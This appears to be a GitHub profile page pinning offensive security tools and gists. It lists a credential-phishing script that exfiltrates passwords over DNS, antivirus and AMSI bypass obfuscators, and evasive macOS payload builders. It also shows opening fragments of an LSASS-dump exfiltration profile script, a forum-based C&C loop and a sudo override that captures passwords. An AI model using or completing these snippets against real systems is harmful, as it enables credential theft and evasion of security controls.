tokyoneon@kali ~#

Pinned

  1. CredPhish (Public)

    CredPhish is a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS.

    PowerShell, 278 stars, 44 forks

  2. exfil LSASS dump via Microsoft.PowerShell_profile.ps1

    # write-up: https://www.varonis.com/blog/author/tokyoneon/

    # an if statement to prevent the attack from executing without administrator privileges
    if (whoami /groups | findstr /i "S-1-16-12288")
    {

  3. Chimera (Public)

    Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.

    PowerShell, 1.4k stars, 229 forks

  4. Armor (Public)

    Armor is a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners.

    Shell, 274 stars, 57 forks

  5. MyCC - turn MyBB forums into C&C servers

    #!/bin/bash

    # https://null-byte.com/turn-forums-into-c-c-servers-0196708/

    while true; do

  6. Sudo function for stealing Linux passwords

    function sudo () 
    { 
        # https://null-byte.com/privesc-0194190/
        realsudo="$(which sudo)";
        read -s -p "[sudo] password for $USER: " inputPasswd;